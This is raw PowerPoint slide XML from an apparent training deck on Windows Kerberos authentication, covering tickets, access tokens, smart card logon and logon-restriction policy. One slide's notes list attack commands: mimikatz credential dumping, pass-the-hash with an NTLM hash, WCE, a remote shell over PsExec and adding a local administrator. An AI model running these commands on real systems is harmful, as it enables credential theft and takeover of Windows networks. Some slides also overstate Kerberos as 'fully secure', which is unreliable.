            <a:endParaRPr lang="de-DE"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When the client on the user's workstation receives KRB_AP_REP, it decrypts the service's authenticator with the session key it shares with the service and compares the time returned by the service with the time in the client's original authenticator. If the times match, the client knows that the service is genuine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="900" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Building an access token from a Kerberos service ticket</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE"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credentials reach the server, the Windows Server 2003 token creation process is the same as that of earlier Windows versions. After the server authenticates the client using Kerberos authentication, the PAC is taken from the service ticket and used to create the user's access token.</a:t>
            </a:r>
          </a:p>
          <a:p>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Remote resource authorization</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE"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the service has an access token for the user, it still needs to verify that the user is authorized to do what the user wants to do. Except for the Kerberos authentication, security access checks are nearly identical with those of Windows NT 4.0 and earlier versions:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE"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The client redirector sends an SMB message requesting file access.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE"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Server security compares file permissions with the user's credentials and grants or denies access.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE"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If access is granted, the connection proceeds.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pP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During the connection, the session key can be used to encrypt application data, or the client and server can share another key for this purpose.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="900" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe"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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24628712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900" b="0" i="0" kern="1200" dirty="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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27915326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CD0E444A-B36E-400A-A8D6-1C82AC119240}" type="slidenum">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>58</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37655844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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2171933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6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20354056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strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Password Protection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The Kerberos protocol's primary innovation is that user passwords do not need to be sent over a network, either in plain text or under encryption. The protocol instead relies on secret keys that are transmitted in an encryption that cannot be intercepted. If the security of a network is compromised, it is still not possible for trespassers to interpret the content of network communication. User authentication and target services remain secure.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Client/Server Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Within Kerberos, the client and server must each authenticate to the other. Communication breaks down if each side is not able to authenticate the counterpart.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Client/Server Ticket Certification</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>In addition to the mutual authentication, the tickets passed from server to client, and vice versa, are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" u="none" strike="noStrike" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>timestamped</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> and include lifetime information. The duration of authentication is thus limited. The duration of a user implementation may be modified by design, but the limit is generally low enough to ensure that replay attacks (and brute force attacks) are not feasible. By ensuring that the lifetime is less than any theoretically-possible encryption cracking time, the communication remains fully secure.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Durability and Reusability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Authentications using the Kerberos protocol are durable and reusable. Once a user has authenticated using the protocol, the authentication is reusable for the lifetime of the ticket. In other words, it is possible to remain authenticated through the Kerberos protocol without having to re-enter a user name and password across the network (until the authentication expires).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Service Session Key Generation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Because the Kerberos model uses a dual-key encryption methodology, the service session key that results also provides a special connection between the client and service that is completely secure. This special "secret" connection is usable as an encryption key for the client/service conversation, which adds extra security to Kerberos-based communications.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Internet Standards</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The Kerberos protocol relies entirely on open Internet standards, and is not limited to proprietary codes or authentication mechanisms. This allows developers to rely on any number of free and open reference implementations through public means. In addition, inexpensive commercial implementations may be purchased or independently developed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Ubiquity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Perhaps the greatest strength of Kerberos is "strength in numbers." Because Kerberos has become so widely used and trusted by top developers, security experts and cryptologists, any new weaknesses or breaches are likely to be identified and overcome immediately. Unlike an unusual proprietary system, there is enough investment in Kerberos that its security has reached a critical mass that would be nearly impossible to overcome.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0"/>
              <a:t>Support for the smart card logon feature</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Through the Kerberos PKINIT extension, both Windows 2000 and Windows Server 2003 include support for the smart card logon feature. The smart card logon feature provides much stronger authentication than the password logon feature does because it relies on a two-factor authentication: To log on, a user needs to possess a smart card and know its PIN code. The smart card logon feature also offers other security advantages; for example, it can block Trojan horse attacks that try to grab a user's password from the system memory. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CD0E444A-B36E-400A-A8D6-1C82AC119240}" type="slidenum">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>60</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6482485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61</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18750328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sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CD0E444A-B36E-400A-A8D6-1C82AC119240}" type="slidenum">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>62</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23043242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000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>C:\mimikatz\x64\mimikatz.exe "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>sekurlsa</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logonPasswords</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exit</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRP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hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> = '39adbe3fcd45600a31b9ee56122b4a87'</a:t>
            </a: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C:\mimikatz\x64\mimikatz.exe "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>sekurlsa</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pth</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user:install</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domain:a</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ntlm</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hash</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run:powershell</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exit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1000" dirty="0"/>
              <a:t>---------------------------------------------------------------------------------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1000" dirty="0"/>
              <a:t>.\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1000" dirty="0" err="1"/>
              <a:t>wce</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1000" dirty="0"/>
              <a:t>.\wce.exe -s &lt;WCE String&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1000" dirty="0" err="1"/>
              <a:t>net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1000" dirty="0" err="1"/>
              <a:t>use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1000" dirty="0"/>
              <a:t> \\&lt;IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1000" dirty="0" err="1"/>
              <a:t>Address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1000" dirty="0"/>
              <a:t>&gt;\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1000" dirty="0" err="1"/>
              <a:t>ipc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1000" dirty="0"/>
              <a:t>$ /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1000" dirty="0" err="1"/>
              <a:t>user:a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1000" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1000" dirty="0" err="1"/>
              <a:t>administrator</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1000" dirty="0"/>
              <a:t>PsExec.exe \\&lt;IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1000" dirty="0" err="1"/>
              <a:t>Address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1000" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1000" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1000" dirty="0" err="1"/>
              <a:t>net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1000" dirty="0" err="1"/>
              <a:t>localgroup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1000" dirty="0" err="1"/>
              <a:t>administrators</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1000" dirty="0"/>
              <a:t> &lt;User Name&gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1000" dirty="0" err="1"/>
              <a:t>add</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CD0E444A-B36E-400A-A8D6-1C82AC119240}" type="slidenum">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>63</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="690368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CD0E444A-B36E-400A-A8D6-1C82AC119240}" type="slidenum">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>64</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19888539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CD0E444A-B36E-400A-A8D6-1C82AC119240}" type="slidenum">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>65</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="146403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CD0E444A-B36E-400A-A8D6-1C82AC119240}" type="slidenum">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>66</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9339057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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30166264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CD0E444A-B36E-400A-A8D6-1C82AC119240}" type="slidenum">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>68</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38129284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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2641000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22207864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noProof="0" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Enforce Logon Restrictions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Q: What does Enforce Logon Restrictions mean? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>A: There is a setting for the Kerberos policy called Enforce Logon Restrictions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" noProof="0" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>. With this setting enabled, every time a user uses a ticket-granting-ticket (TGT) to request a ticket, the account is checked to see if it is still valid. That would prevent a disabled account from obtaining new session tickets.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" i="1" noProof="0" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Additionally, for performance reasons, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" noProof="0" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>this policy is not checked</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>This policy is only checked if it has not been checked recently :</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" noProof="0" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>If a TGT was granted in the last 20 minutes or if a restriction check was done in the last 20 minutes (too).  </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" noProof="0" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>(20 minutes ==  how long after a ticket is issued do we need to start checking restrictions again)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>If the client is from a different realm (domain).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Reference: 274064: Network Services Can Be Accessed After Account Is Disabled </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" noProof="0" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://support.microsoft.com/default.aspx?scid=kb;EN-US;274064</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11477427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latin typeface="Arial"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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25512346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latin typeface="Arial"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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34023880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latin typeface="Arial"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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35124949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74</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
